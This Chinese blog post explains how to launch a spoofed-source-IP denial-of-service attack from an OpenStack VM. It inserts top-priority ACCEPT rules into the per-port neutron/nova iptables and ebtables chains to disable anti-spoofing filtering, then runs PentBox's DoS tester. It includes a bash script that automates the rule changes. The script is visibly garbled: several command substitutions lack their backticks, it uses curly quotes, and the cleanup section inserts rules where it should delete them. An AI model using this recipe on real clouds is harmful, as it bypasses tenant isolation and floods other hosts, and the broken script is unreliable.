Openstack中构造伪造源地址攻击

前一篇是将防御,这一篇简单说一下openstack下如何发动伪造源ip的DoS攻击
1 修改iptables和ebtables的设定,例如攻击vm为100.0.0.17,那么查询相应的iptables规则:

找到iptables中含有091f121f-8的链:neutron-openvswi-s091f121f-8,neutron-openvswi-i091f121f-8,neutron-openvswi-o091f121f-8,和nova-instance-xxx(与该vm对应的)插入一条优先级最高的ACCEPT链

找到ebtables中nat表中091f121f-8的链:I-tap091f121f-8c-arp-ip,I-tap091f121f-8c-ipv4-ip,插入一条优先级最高的ACCEPT链

2 安装ruby,下载pentibox

3 启动pentibox,选择Network tools->Net DoS Tester -> 任意一种即可发动攻击

如果第1步中加了规则还是不通,请检查源主机和目的主机的安全组是否允许

下面的我写的脚本,希望对大家有所帮助

 Bash | 
 
 copy code |
?

1
2
#!/bin/bash
3
 
4
ip=$1
5
echo $ip
6
id=<code>neutron port-list |grep "$ip"|awk '{print $2}'

echo $id
if [ -z $id ]
then
echo “id null”
exit 1
fi
itid=expr substr $id 1 10
echo $itid
etid=expr substr $id 1 11
echo $etid

novarule=iptables -L -nvx|grep $ip|grep nova |awk '{print $3}'
echo $novarule
#clear previous rules
iptables -D neutron-openvswi-s$itid -j ACCEPT
iptables -D neutron-openvswi-i$itid -j ACCEPT
iptables -D neutron-openvswi-o$itid -j ACCEPT
iptables -D $novarule -j ACCEPT

ebtables -t nat -I I-tap$etid-arp-ip -j ACCEPT
ebtables -t nat -I I-tap$etid-ipv4-ip -j ACCEPT

#create rules
iptables -I neutron-openvswi-s$itid -j ACCEPT
iptables -I neutron-openvswi-i$itid -j ACCEPT
iptables -I neutron-openvswi-o$itid -j ACCEPT
iptables -I $novarule -j ACCEPT

ebtables -t nat -I I-tap$etid-arp-ip -j ACCEPT
ebtables -t nat -I I-tap$etid-ipv4-ip -j ACCEPT

Leave a Comment

Your email address will not be published. Required fields are marked *